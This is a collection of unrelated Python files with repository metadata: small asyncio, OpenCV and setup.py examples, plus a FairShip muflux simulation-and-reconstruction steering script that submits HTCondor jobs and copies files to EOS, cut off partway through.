af6a652fa0f874ec7d1a8c91a4a5b77365f67462 | b8085ef607da70023214f105eb27bdbc713e596f | /Day2/Async3.py | 7774674800fd4e6e93ddc3f94d67f879c4b88f34 | [] | no_license | artheadsweden/python_adv_april19 | 893c9ec76e8505a580439b7a2fd7aa2776503c77 | 04eecd25d4a291dddd608d94968b217fed7b88d8 | refs/heads/master | 2020-05-07T13:41:15.545033 | 2019-04-11T18:47:22 | 2019-04-11T18:47:22 | 180,559,955 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 579 | py | import asyncio
import random
async def my_other(id):
process_time = random.randint(1, 5)
await asyncio.sleep(process_time)
print(f"Coroutine {id}, has successfully completed after {process_time} seconds")
async def my_coroutine():
tasks = []
for i in range(10):
tasks.append(asyncio.ensure_future(my_other(i)))
await asyncio.gather(*tasks)
print("All done")
def main():
loop = asyncio.get_event_loop()
try:
loop.run_until_complete(my_coroutine())
finally:
loop.close()
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
42f186c04422a74342c1a20c27768ff9e674740e | e262e64415335060868e9f7f73ab8701e3be2f7b | /.history/Test_001/test_level_20201125190551.py | 1d0a30117b583608aaa4a2ed7178dc99529f1651 | [] | no_license | Allison001/developer_test | 6e211f1e2bd4287ee26fd2b33baf1c6a8d80fc63 | b8e04b4b248b0c10a35e93128a5323165990052c | refs/heads/master | 2023-06-18T08:46:40.202383 | 2021-07-23T03:31:54 | 2021-07-23T03:31:54 | 322,807,303 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 84 | py | import allure
@
def test_hight():
print("这是一条高级别的测试用例") | [
"[email protected]"
] | |
b5dd0646b1b2c4b271da16df28f9fa635ae98a8c | 6162b166a93c60677b97b91c1f07be1511fd05e2 | /catkin_ws/src/jackal_hunt_rabbit/scripts/output.py | ae97f3dd5df85b938f61ff6c608095446704d1bb | [] | no_license | SiChiTong/fuzzy-eureka | d7c540e4349621097ee861e7337488ba46a2c718 | 61e2075cfd99520e0fb689e47aa73b3d43481f18 | refs/heads/master | 2021-08-24T09:04:28.384368 | 2017-12-08T23:30:23 | 2017-12-08T23:30:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 912 | py | #!/usr/bin/env python
import cv2
import numpy as np
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.namedWindow("ouput", flags = cv2.WINDOW_NORMAL)
img = np.zeros((512, 2400, 3), np.uint8)
def draw_egg(color, count, x, y):
cv2.ellipse(img, (x, y), (140, 200), 0, 0, 360, color, -1)
cv2.putText(img, count, (x - 80, y + 100), font, 8, (255, 255, 255), 12)
def show_output(eggs):
draw_egg((255, 0, 255), str(eggs[0]), 200, 250) # Magenta
draw_egg((0, 165, 255), str(eggs[1]), 600, 250) # Orange
draw_egg((0, 215, 255), str(eggs[2]), 1000, 250) # Yellow
draw_egg((0, 255, 0), str(eggs[3]), 1400, 250) # Green
draw_egg((255, 80, 0), str(eggs[4]), 1800, 250) # Blue
draw_egg((220, 40, 140), str(eggs[5]), 2200, 250) # Purple
    cv2.imshow('output', img)
    cv2.resizeWindow('output', 2400, 512)
    cv2.moveWindow('output', 1125, 250)
key = cv2.waitKey(0)
cv2.destroyAllWindows()
| [
"[email protected]"
] | |
a149725c1bd9437f884bb652f73407173011b1b8 | 8e3a27091d51c3fd9681f5caf0534a0d3a36c3ff | /setup.py | d6e064fc1b06aca13b6baa6cd70dd4d6360354cb | [
"MIT"
] | permissive | DES-SL/EasyLens | c5c5d9dc5af7d6495027f7cfe51cdf48c0a098de | 97673d65abc00b945e7c6332e465c1d08fcb09a9 | refs/heads/master | 2020-04-06T07:09:07.342981 | 2016-11-08T10:47:20 | 2016-11-08T10:47:20 | 58,768,462 | 1 | 0 | null | 2016-05-20T06:19:18 | 2016-05-13T19:51:37 | Jupyter Notebook | UTF-8 | Python | false | false | 2,058 | py | #!/usr/bin/env python
import os
import sys
from setuptools.command.test import test as TestCommand
from setuptools import find_packages
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist upload')
sys.exit()
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
errno = pytest.main(self.test_args)
sys.exit(errno)
readme = open('README.rst').read()
doclink = """
Documentation
-------------
The full documentation can be generated with Sphinx"""
history = open('HISTORY.rst').read().replace('.. :changelog:', '')
requires = [] #during runtime
tests_require=['pytest>=2.3'] #for testing
PACKAGE_PATH = os.path.abspath(os.path.join(__file__, os.pardir))
setup(
name='easylens',
version='0.1.0',
description='Software package for modeling strong lens systems in the Dark Energy Survey data.',
long_description=readme + '\n\n' + doclink + '\n\n' + history,
author='Simon Birrer',
author_email='[email protected]',
url='https://github.com/DES-SL/EasyLens',
packages=find_packages(PACKAGE_PATH, "test"),
package_dir={'EasyLens': 'EasyLens'},
include_package_data=True,
install_requires=requires,
license='Proprietary',
zip_safe=False,
keywords='EasyLens',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
"Intended Audience :: Science/Research",
'Intended Audience :: Developers',
'License :: MIT License',
'Natural Language :: English',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
],
tests_require=tests_require,
cmdclass = {'test': PyTest},
)
| [
"[email protected]"
] | |
2a07ec5c9d77cdcc63263b3d1d6bc88a852f922f | 1a7595a5896ca709eb98805b2a570bf12775a9ff | /charmdet/runSimulation.py | fc5ba183cbf7a706b2c96ac695c39211242b342e | [] | no_license | nathandpenha/CERN-FairShip | 953683117f4971b323392bc1213b7ae7d9a3a708 | 10db3d519a5ac8fd67132afd39736b550cb60a30 | refs/heads/master | 2021-05-24T10:10:11.763338 | 2020-05-06T18:46:14 | 2020-05-06T18:46:14 | 261,848,065 | 2 | 0 | null | 2020-05-06T18:47:30 | 2020-05-06T18:39:22 | C++ | UTF-8 | Python | false | false | 42,585 | py | import os,subprocess,ROOT,time,multiprocessing,socket
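# Steering script for the muflux MC production chain: event simulation,
# digitization, track reconstruction and histogramming, run either
# interactively on multi-core nodes or via HTCondor, with files kept on EOS.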
ncpus = multiprocessing.cpu_count() - 2
interactive = not socket.gethostname().find('ubuntu')<0
pathToMacro = '' # $SHIPBUILD/FairShip/charmdet/
commandToHist = {"anaResiduals":"histos-analysis-","momResolution":"histos-momentumResolution-","plotDTPoints":"histos-DTPoints-",
"hitmaps":"histos-HitmapsFromFittedTracks-","alignment":"histos-residuals-","MCJpsiProd":"histos-Jpsi"}
commandToSum = {"anaResiduals":"momDistributions-","momResolution":"momentumResolution-","plotDTPoints":"DTPoints-","alignment":"residuals-",
"hitmaps":"HitmapsFromFittedTracks-","MCJpsiProd":"JpsiKinematics"}
def count_python_processes(macroName):
# only works if screen is wide enough to print full name!
status = subprocess.check_output('ps -f -u truf',shell=True)
n=0
for x in status.split('\n'):
if not x.find(macroName)<0 and not x.find('python') <0: n+=1
return n
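# Sketch of a width-independent alternative (an assumption, not used by the
# functions below): count the entries of 'ps -u truf -o args' whose full
# command line contains both 'python' and macroName.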
fileList = {}
badFiles = []
eospath='/eos/experiment/ship/data/Mbias/background-prod-2018/'
def JpsiProdP8(run):
for n in range(run,run+15):
os.system("python $FAIRSHIP/macro/JpsiProdWithPythia8.py -n 100000000 -r "+str(n)+" &")
def mergeJpsiProdP8():
cmd = 'hadd Jpsi-Pythia8_XXXX_0-74.root'
N=0
for n in range(75):
fname = "Jpsi-Pythia8_100000000_"+str(n)+".root"
if not os.path.isfile(fname): continue
f = ROOT.TFile(fname)
if not f: continue
if not f.Get('pythia6'): continue
N+=100000000
cmd += " "+fname
cmd=cmd.replace('XXXX',str(N))
os.system(cmd)
def JpsiProdP8_withHTCondor(run=10000,njobs=1000,NPot=1000000,merge=False):
# microcentury = 1h ok with 1000000 NPot, 45min
# workday = 8h would be ok with 5000000
eosLocation = os.environ['EOSSHIP']+"/eos/experiment/ship/user/truf/muflux-sim/JpsiProduction_P8/"
temp = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l /eos/experiment/ship/user/truf/muflux-sim/JpsiProduction_P8",shell=True)
cmd = "hadd Jpsi-Pythia8_XXXX_"+str(run)+"-"+str(run+njobs)+".root"
Ntot = 0
for n in range(run,run+njobs):
output = "Jpsi-Pythia8_"+str(NPot)+"_"+str(n)+".root"
if not merge:
# create condor sub
fc = open('condorJ.sub','w')
fc.write('executable = JpsiProd.sh\n')
fc.write('arguments = '+str(NPot)+' '+str(n)+' '+output+' '+eosLocation+output +' \n')
fc.write('should_transfer_files = YES\n')
fc.write('when_to_transfer_output = ON_EXIT\n')
x = 'run_'+str(n)
fc.write('output = output/'+x+'.out\n')
fc.write('error = error/'+x+'.err\n')
fc.write('log = log/'+x+'.log\n')
fc.write('+JobFlavour = "workday"\n') #"microcentury" workday
fc.write('queue\n')
fc.close()
os.system('condor_submit condorJ.sub')
else:
eosfile = (eosLocation+output)
if output in temp:
f=ROOT.TFile.Open(eosfile)
if f.Get('pythia6'):
cmd += " "+eosfile
Ntot+=NPot
if merge:
cmd = cmd.replace('XXXX',str(Ntot))
tmp = cmd.split(' ')
outfile = tmp[1]
cmd = 'hadd -f '+outfile
N=0
for n in range(2,len(tmp)):
N+=1
cmd += ' ' + tmp[n]
if N>500:
os.system(cmd)
os.system('cp '+outfile+' tmp.root')
cmd = "hadd -f "+outfile+' tmp.root '
N=0
os.system(cmd)
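# the merge above restarts hadd every ~500 inputs and carries the partial
# result forward via tmp.root, keeping the shell argument list short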
def run_FixedTarget(start):
N = 10000
for n in range(start,start+ncpus):
cmd = "python $FAIRSHIP/muonShieldOptimization/run_MufluxfixedTarget.py -n "+str(N)+" -e 1 -P -o run-"+str(n)+" &"
os.system(cmd)
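        # throttle: block until a CPU slot frees up before launching the next job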
while 1>0:
if count_python_processes('run_MufluxfixedTarget')<ncpus: break
time.sleep(100)
print "finished all the tasks."
def mergeFiles():
N = 0
cmd = 'hadd -f pythia8_Geant4_1000_1.0-XXX.root '
for d in os.listdir('.'):
if d.find('run')<0:continue
if os.path.isdir(d):
fname = d+'/pythia8_Geant4_1000_1.0.root'
if not os.path.isfile(fname): continue
f = ROOT.TFile(fname)
if f.Get('cbmsim'):
cmd += fname+' '
N+=1
os.system(cmd.replace('XXX',str(N)))
def submit2Condor(eospath,directory,filename,command="anaResiduals"):
sub = filename.replace('root','sub')
f = open(sub,'w')
f.write("executable = /afs/cern.ch/user/t/trufship/muflux/runDriftTubeScript.sh\n")
f.write("arguments = "+command+" "+eospath+directory+"/"+filename+"\n")
f.write("output = "+filename.replace('root','out')+"\n")
f.write("error = "+filename.replace('root','error')+"\n")
f.write("log = "+filename.replace('root','log')+"\n")
f.write("queue\n")
f.close()
os.system("condor_submit "+sub)
def getFilesFromEOS(E="10.0_withCharmandBeauty"): # E="1.0"
# list of files
temp = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+eospath,shell=True)
for x in temp.split('\n'):
if x.find(E)<0 or x.find('_mu')<0: continue # includes charm
fname = x[x.find('/eos'):]
nentries = 0
f=ROOT.TFile.Open(os.environ['EOSSHIP']+fname)
nentries=f.cbmsim.GetEntries()
fileList[fname]=nentries
return fileList
def getFilesLocal(d='.'):
# list of files
fl = []
temp = os.listdir(d)
for x in temp:
if os.path.isdir(d+'/'+x): fl.append(x)
return fl
def getFilesEOS(D):
eospathSim = '/eos/experiment/ship/user/truf/muflux-sim/'+D
temp = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+eospathSim,shell=True)
fl = []
for x in temp.split('\n'):
if x.find('pythia8_Geant4')<0: continue
d = x[x.rfind('/')+1:]
fl.append(eospathSim+'/'+d)
return fl
def simulationStep(fnames=[],E="10.0_withCharmandBeauty",overwrite=False):
if len(fnames)==0: fnames = getFilesFromEOS(E)
Nfiles = len(fnames)
print "fileList established ",Nfiles
for fname in fnames:
N = fnames[fname]-1
odir = fname[fname.rfind('/')+1:].replace('.root','')
if not overwrite and odir in os.listdir('.'): continue
cmd = "python $FAIRSHIP/macro/run_simScript.py -n "+str(N)+" --MuonBack --charm=1 --CharmdetSetup=0 --output "+odir+" -f "+fname+" &"
print 'step 1:', cmd
os.system(cmd)
while 1>0:
if count_python_processes('run_simScript')<ncpus: break
time.sleep(100)
print "finished all the tasks."
def digiStep(fnames=[]):
if len(fnames)==0: fnames = getFilesLocal()
Nfiles = len(fnames)
print "fileList established ",Nfiles
for fname in fnames:
os.chdir(fname)
mcFile = 'ship.conical.MuonBack-TGeant4.root'
geoFile = 'geofile_full.conical.MuonBack-TGeant4.root'
cmd = "python $FAIRSHIP/macro/runMufluxDigi.py -n 9999999 -f "+mcFile+" -g "+geoFile+" &"
print 'step 2:', cmd
os.system(cmd)
os.chdir('../')
while 1>0:
if count_python_processes('runMufluxDigi')<ncpus: break
time.sleep(100)
print "finished all the tasks."
def findDirWithSim():
fnames = getFilesLocal()
stats = {'simOnly':[],'tmp':[],'failed':[],'digi':[],'digireco':{}}
for fname in fnames:
geo = False
digi = False
tmp = False
digiSplit = 0
reco = 0
for x in os.listdir(fname):
if not x.find('geofile_full.conical.MuonBack-TGeant4')<0: geo = True
if not x.find('roottmp')<0: tmp = True
if not x.find('dig.root')<0: digi = True
if not x.find('dig_RT')<0: reco+=1
if not x.find('dig-')<0: digiSplit+=1
if tmp: stats['tmp'].append(fname)
elif digi: stats['digi'].append(fname)
elif geo:
if reco==0 and digiSplit==0: stats['simOnly'].append(fname)
else : stats['failed'].append(fname)
stats['digireco'][fname]=[digiSplit,reco]
for x in stats['tmp']:
f = ROOT.TFile(x+'/ship.conical.MuonBack-TGeant4.roottmp')
try:
if f.cbmsim.GetEntries()>0:
print 'tmp file ok, replace root file',x
os.system('mv '+x+'/ship.conical.MuonBack-TGeant4.roottmp '+x+'/ship.conical.MuonBack-TGeant4.root')
except:
print 'tmp file not ok',x
return stats
def splitDigiFiles(splitFactor=5,fnames=[]):
if len(fnames)==0: fnames = getFilesLocal()
Nfiles = len(fnames)
print "fileList established ",Nfiles
for fname in fnames:
os.chdir(fname)
ofile = 'ship.conical.MuonBack-TGeant4_dig.root'
if not ofile in os.listdir('.'):
os.chdir('../')
continue
origin = ROOT.TFile(ofile)
if not origin.GetKey('cbmsim'):
print "corrupted file",fname
os.chdir('../')
continue
sTree = origin.cbmsim
N = 0
deltaN = int(sTree.GetEntries()/float(splitFactor))
for i in range(splitFactor):
nf = ofile.replace('.root','-'+str(i)+'.root')
if nf in os.listdir('.'):
print "file exists",fname,nf
else:
newFile = ROOT.TFile(nf,'RECREATE')
newTree = sTree.CloneTree(0)
for n in range(N,N+deltaN):
rc = sTree.GetEntry(n)
rc = newTree.Fill()
newFile.Write()
N+=deltaN
os.chdir('../')
def recoStep(splitFactor=5,fnames=[],eospath=False):
eospathSim = '/eos/experiment/ship/user/truf/muflux-sim/'
if len(fnames)==0: fnames = getFilesLocal()
Nfiles = len(fnames)
print "fileList established #directories",Nfiles
for fname in fnames:
os.chdir(fname)
mcFile = 'ship.conical.MuonBack-TGeant4_dig_RT.root'
ofile = 'ship.conical.MuonBack-TGeant4_dig.root'
for i in range(splitFactor):
recoFile = mcFile.replace('.root','-'+str(i)+'.root')
if recoFile in os.listdir('.'):
test = ROOT.TFile(recoFile)
sTree = test.Get('cbmsim')
if sTree:
if sTree.GetBranch("FitTracks"): continue
test.Close()
digiFile = ofile.replace('.root','-'+str(i)+'.root')
if digiFile in os.listdir('.'):
os.system('cp '+ofile.replace('.root','-'+str(i)+'.root')+' '+recoFile)
elif not recoFile in os.listdir('.'):
if eospath:
os.system('xrdcp $EOSSHIP'+eospathSim+'/'+eospath+'/'+fname+'/'+digiFile+ ' '+recoFile)
else:
print "digiFile missing",fname,digiFile
continue
cmd = "python $FAIRSHIP/charmdet/drifttubeMonitoring.py -c recoStep1 -u 1 -f "+recoFile+' &'
print 'step 2:', cmd,' in directory ',fname
os.system(cmd)
while 1>0:
if count_python_processes('drifttubeMonitoring')<ncpus: break
time.sleep(100)
os.chdir('../')
print "finished all the tasks."
def checkFilesWithTracks(D='.',splitFactor=5,dimuon=False):
eos = ''
if D=='.': fnames = getFilesLocal()
elif D.find('1GeV')==0 or D.find('10GeV')==0:
fnames = getFilesEOS(D)
eos = os.environ['EOSSHIP']
fileList=[]
fileListPer={}
failedList = []
for fname in fnames:
fileListPer[fname]={}
mcFile = 'ship.conical.MuonBack-TGeant4_dig_RT.root'
for i in range(splitFactor):
recoFile = fname+'/'+mcFile.replace('.root','-'+str(i)+'.root')
if dimuon: recoFile = recoFile.replace('.root','_dimuon99.root')
if D=='.': dirList = os.listdir(fname)
else: dirList = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls "+fname,shell=True)
if recoFile.replace(fname+'/','') in dirList:
test = ROOT.TFile.Open(eos+recoFile)
if not test: continue
sTree = test.Get('cbmsim')
if sTree:
if sTree.GetBranch("FitTracks"):
fileList.append(recoFile)
size = sTree.GetBranch('FitTracks').GetTotalSize()/float(sTree.GetEntries())
fileListPer[fname][recoFile.replace(D+'.'+fname+'/','')]=size
# print "check",fname,recoFile,size
else:
failedList.append(fname+'/'+recoFile)
fileList.sort()
return fileList,fileListPer,failedList
def cleanUp():
reco,x,y = checkFilesWithTracks()
for f in reco:
df = f.replace('_RT','')
if os.path.isfile(df): os.system('rm ' +df)
def makeHistos(D='.',splitFactor=5,command="anaResiduals",fnames=[]):
if D=='.':
fileList,x,y = checkFilesWithTracks(D,splitFactor)
print "fileList established ",len(fileList)
for df in fileList:
tmp = df.split('/')
if len(tmp)>1: os.chdir(tmp[0])
if not commandToHist[command]+tmp[1] in os.listdir('.'):
cmd = "python $FAIRSHIP/charmdet/drifttubeMonitoring.py -c "+command+" -f "+tmp[1]+' &'
print 'execute:', cmd
os.system(cmd)
if len(tmp)>1: os.chdir('../')
while 1>0:
if count_python_processes('drifttubeMonitoring')<ncpus: break
time.sleep(100)
elif D.find('1GeV')==0 or D.find('10GeV')==0:
eospathSim = '/eos/experiment/ship/user/truf/muflux-sim/'+D
temp = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+eospathSim,shell=True)
for x in temp.split('\n'):
if x.find('pythia8_Geant4')<0: continue
d = x[x.rfind('/')+1:]
if not d in os.listdir('.'): os.system('mkdir '+d)
os.chdir(d)
temp2 = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+eospathSim+'/'+d,shell=True)
fileList = []
for y in temp2.split('\n'):
f = os.environ['EOSSHIP'] + y[y.find('/eos'):]
if not f[f.rfind('/')+1:].find('ship')==0: continue
if f.find('RT')<0: continue
histFile = commandToHist[command]+y[y.rfind('/')+1:]
if histFile in os.listdir('.') : continue
if interactive:
cmd = "python $FAIRSHIP/charmdet/drifttubeMonitoring.py -c "+command+" -f "+f+' >'+histFile.replace('histo','log')+' &'
print 'execute:', cmd
os.system(cmd)
while 1>0:
if count_python_processes('drifttubeMonitoring')<ncpus: break
time.sleep(100)
                else: submit2Condor(eospathSim,d,y[y.rfind('/')+1:],command)
os.chdir('../')
else:
eospathSim10GeV = '/eos/experiment/ship/data/muflux/MC/19feb2019'
fileList = []
temp = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+eospathSim10GeV,shell=True)
for x in temp.split('\n'):
if x.find('RT.root')<0: continue
fileList.append( os.environ['EOSSHIP'] + x[x.find('/eos'):])
for fname in fileList:
if os.path.isfile(commandToHist[command]+fname[fname.rfind('/')+1:]): continue
cmd = "python $FAIRSHIP/charmdet/drifttubeMonitoring.py -c "+command+" -f "+fname+' &'
print 'command:', cmd
os.system(cmd)
while 1>0:
if count_python_processes('drifttubeMonitoring')<ncpus: break
time.sleep(10)
print "finished all the tasks."
def makeHistosWithHTCondor(D='10GeV-repro',splitFactor=10,command="anaResiduals",fnames=[]):
eospathSim = '/eos/experiment/ship/user/truf/muflux-sim/'+D
temp = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls "+eospathSim,shell=True)
for d in temp.split('\n'):
if d.find('pythia8_Geant4')<0: continue
temp2 = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls "+d,shell=True)
fileList = []
for fname in temp2.split('\n'):
if not fname[fname.rfind('/')+1:].find('ship')==0: continue
if fname.find('RT-')<0: continue
hfile = commandToHist[command]+fname[fname.rfind('/')+1:]
nfile = 'ntuple-'+fname[fname.rfind('/')+1:]
if command == "alignment": nfile = "histos-HitmapsFromFittedTracks-"+fname[fname.rfind('/')+1:]
            if not temp2.find(hfile)<0: continue  # histogram already exists on EOS
# create condor sub
fc = open('condorX.sub','w')
fc.write('executable = batchScript.sh\n')
fc.write('arguments = '+fname+' '+command+' '+hfile+' '+os.environ['EOSSHIP']+eospathSim+'/'+d+'/'+hfile+' '+nfile+' '+os.environ['EOSSHIP']+eospathSim+'/'+d+'/'+nfile+' \n')
fc.write('should_transfer_files = YES\n')
fc.write('when_to_transfer_output = ON_EXIT\n')
x = fname[fname.rfind('/')+1:]
fc.write('output = output/'+x+'.out\n')
fc.write('error = error/'+x+'.err\n')
fc.write('log = log/'+x+'.log\n')
fc.write('+JobFlavour = "microcentury"\n')
fc.write('queue\n')
fc.close()
os.system('condor_submit condorX.sub')
time.sleep(0.1)
def HTCondorStats(D='10GeV-repro',command="anaResiduals",fnames=[]):
eospathSim = '/eos/experiment/ship/user/truf/muflux-sim/'+D
stats = {}
if len(fnames)==0:
temp = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls "+eospathSim,shell=True)
fnames = temp.split('\n')
for x in fnames:
if x.find("pythia8")<0: continue
run = x[x.rfind('/')+1:]
eospathSimR = eospathSim+'/'+run
stats[run]={'recoFiles':[],'histoFiles':[]}
temp = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls "+eospathSimR,shell=True)
for z in temp.split('\n'):
if z.find('.root')<0: continue
stats[run]['recoFiles'].append( os.environ['EOSSHIP'] + z[z.find('/eos'):])
# all RT files with tracks
temp2 = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls "+eospathSimR,shell=True)
for fname in stats[run]['recoFiles']:
if not fname.find('sys')<0: continue
hfile = commandToHist[command]+fname[fname.rfind('/')+1:]
if not temp2.find(hfile)<0:
stats[run]['histoFiles'].append(hfile)
total = [0,0]
for x in stats:
print x,len(stats[x]['recoFiles']),len(stats[x]['histoFiles']),'missing:',len(stats[x]['recoFiles'])-len(stats[x]['histoFiles'])
total[0]+=len(stats[x]['recoFiles'])
total[1]+=len(stats[x]['histoFiles'])
print "summary total reco",total[0],' histos',total[1],' missing',total[0]-total[1]
return stats
def makeMomResolutions(D='.',splitFactor=5):
if D=='.':
fileList,x,y = checkFilesWithTracks(D,splitFactor)
print "fileList established ",len(fileList)
for df in fileList:
tmp = df.split('/')
if len(tmp)>1: os.chdir(tmp[0])
if not "histos-momentumResolution-"+tmp[1] in os.listdir('.'):
cmd = "python $FAIRSHIP/charmdet/drifttubeMonitoring.py -c momResolution -f "+tmp[1]+' &'
print 'execute:', cmd
os.system(cmd)
if len(tmp)>1: os.chdir('../')
while 1>0:
if count_python_processes('drifttubeMonitoring')<ncpus: break
time.sleep(100)
elif D.find('1GeV')==0 or D.find('10GeV')==0:
eospathSim = '/eos/experiment/ship/user/truf/muflux-sim/'+D
temp = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+eospathSim,shell=True)
for x in temp.split('\n'):
if x.find('pythia8_Geant4')<0: continue
d = x[x.rfind('/')+1:]
if not d in os.listdir('.'): os.system('mkdir '+d)
os.chdir(d)
temp2 = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+eospathSim+'/'+d,shell=True)
fileList = []
for y in temp2.split('\n'):
f = os.environ['EOSSHIP'] + y[y.find('/eos'):]
if not f.find('histos')<0: continue
if f.find('RT')<0: continue
histFile = 'histos-momentumResolution-'+y[y.rfind('/')+1:]
if histFile in os.listdir('.') : continue
cmd = "python $FAIRSHIP/charmdet/drifttubeMonitoring.py --c momResolution -f "+f+' &'
print 'execute:', cmd
os.system(cmd)
while 1>0:
if count_python_processes('drifttubeMonitoring')<ncpus: break
time.sleep(100)
os.chdir('../')
print "finished all the tasks."
def checkAlignment(D='.',splitFactor=5):
if D=='.':
fileList,x,y = checkFilesWithTracks(D,splitFactor)
print "fileList established ",len(fileList)
for df in fileList:
tmp = df.split('/')
if len(tmp)>1: os.chdir(tmp[0])
if not "histos-residuals-"+tmp[1] in os.listdir('.'):
cmd = "python $FAIRSHIP/charmdet/drifttubeMonitoring.py -c alignment -f "+tmp[1]+' &'
print 'execute:', cmd
os.system(cmd)
if len(tmp)>1: os.chdir('../')
while 1>0:
if count_python_processes('drifttubeMonitoring')<ncpus: break
time.sleep(100)
elif D.find('1GeV')==0 or D.find('10GeV')==0:
eospathSim = '/eos/experiment/ship/user/truf/muflux-sim/'+D
temp = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+eospathSim,shell=True)
for x in temp.split('\n'):
if x.find('pythia8_Geant4')<0: continue
d = x[x.rfind('/')+1:]
if not d in os.listdir('.'): os.system('mkdir '+d)
os.chdir(d)
temp2 = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+eospathSim+'/'+d,shell=True)
fileList = []
for y in temp2.split('\n'):
f = os.environ['EOSSHIP'] + y[y.find('/eos'):]
test = f[f.rfind('/')+1:]
if not test.find('ship.')==0: continue
if f.find('RT')<0: continue
histFile = 'histos-residuals-'+y[y.rfind('/')+1:]
if histFile in os.listdir('.') : continue
cmd = "python $FAIRSHIP/charmdet/drifttubeMonitoring.py -c alignment -f "+f+' &'
print 'execute:', cmd
os.system(cmd)
while 1>0:
if count_python_processes('drifttubeMonitoring')<ncpus: break
time.sleep(100)
os.chdir('../')
print "finished all the tasks."
def exportToEos(fnames=[],destination="/eos/experiment/ship/user/truf/muflux-sim/1GeV",update=True,tag=None):
remote = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+destination,shell=True).split('\n')
    if len(fnames)==0: fnames = getFilesLocal()  # keep a caller-supplied list if given
for D in fnames:
if not D in remote:
os.system("xrdfs "+os.environ['EOSSHIP']+" mkdir "+destination+"/"+D)
remoteD = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+destination+'/'+D,shell=True)
for f in os.listdir(D):
if tag:
if f.find(tag)<0:continue
if f in remoteD and not update: continue
fname = D+'/'+f
cmd = "xrdcp -f "+fname+" $EOSSHIP/"+destination+"/"+fname
print cmd
os.system(cmd)
def importFromEos(source="/eos/experiment/ship/user/truf/muflux-sim/1GeV",tag="ship.conical.MuonBack-TGeant4.root",update=True):
remote = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+source,shell=True).split('\n')
for x in remote:
if x.find('eos')<0:continue
fname = x.split(source)[1]
files = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+source+fname,shell=True).split('\n')
for y in files:
if y.find('eos')<0:continue
afile = '/eos'+y.split('/eos')[1]
if afile.find(tag)<0:continue
destination = afile.split(source)[1]
cmd = "xrdcp "
if update: cmd += " -f "
cmd += " $EOSSHIP/"+afile+" "+destination[1:]
print cmd
os.system(cmd)
def exportNtupleToEos(d="simulation10GeV-withDeadChannels",key='ntuple',update=True):
eospath = "/eos/experiment/ship/user/truf/muflux-sim/"
destination = eospath+d.replace('simulation','').split('-final')[0]
for D in os.listdir(d):
if os.path.isdir(d+'/'+D):
for f in os.listdir(d+'/'+D):
if f.find(key)==0:
cmd = "xrdcp "+d+'/'+D+'/'+f+ " $EOSSHIP/"+destination+"/"+D+'/'+f
if update : cmd = "xrdcp -f "+d+'/'+D+'/'+f+ " $EOSSHIP/"+destination+"/"+D+'/'+f
print cmd
os.system(cmd)
def mergeHistos(command="anaResiduals"):
dirList=getFilesLocal()
cmd = {}
for z in ['charm','mbias']:
cmd[z] = 'hadd -f '+commandToSum[command]+z+'.root '
for d in dirList:
for x in os.listdir(d):
z='mbias'
if d.find('charm')>0: z='charm'
if (not x.find(commandToHist[command])<0 ): cmd[z] += d+'/'+x+" "
for z in ['charm','mbias']:
os.system(cmd[z])
def mergeNtuple():
dirList=getFilesLocal()
cmd = {}
for z in ['charm','mbias']:
cmd[z] = 'hadd -f ntuple-'+z+'.root '
for d in dirList:
for x in os.listdir(d):
z='mbias'
if d.find('charm')>0: z='charm'
if (not x.find('ntuple')<0 ): cmd[z] += d+'/'+x+" "
for z in ['charm','mbias']:
os.system(cmd[z])
import rootUtils as ut
def checkHistos():
dirList=getFilesLocal()
Ntot = 0
    shit = []  # directories where all histogram files came back empty
for d in dirList:
nfailed = 0
for x in os.listdir(d):
if not x.find('histos-analysis-')<0:
h={}
ut.readHists(h,d+'/'+x,['p/pt'])
N = h['p/pt'].GetEntries()
if N == 0: nfailed+=1
print d+'/'+x,N
Ntot+=N
print nfailed
if nfailed == 10: shit.append(d)
print Ntot
return shit
def checkForFilesWithTracks():
eospathSim10GeV = '/eos/experiment/ship/data/muflux/MC/19feb2019'
fileList = []
trList = []
temp = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+eospathSim10GeV,shell=True)
for x in temp.split('\n'):
if x.find('RT.root')<0: continue
fname = os.environ['EOSSHIP'] + x[x.find('/eos'):]
fileList.append( fname )
test = ROOT.TFile.Open(fname)
if test.GetKey('cbmsim'):
if test.cbmsim.GetBranch('FitTracks'): trList.append(fname)
print len(fileList),len(trList)
def mergeHistos10(case='residuals'):
N = 1
n = 0
for x in os.listdir('.'):
if n==0:
if case == 'residuals': cmd = 'hadd -f residuals-'+str(N)+'.root '
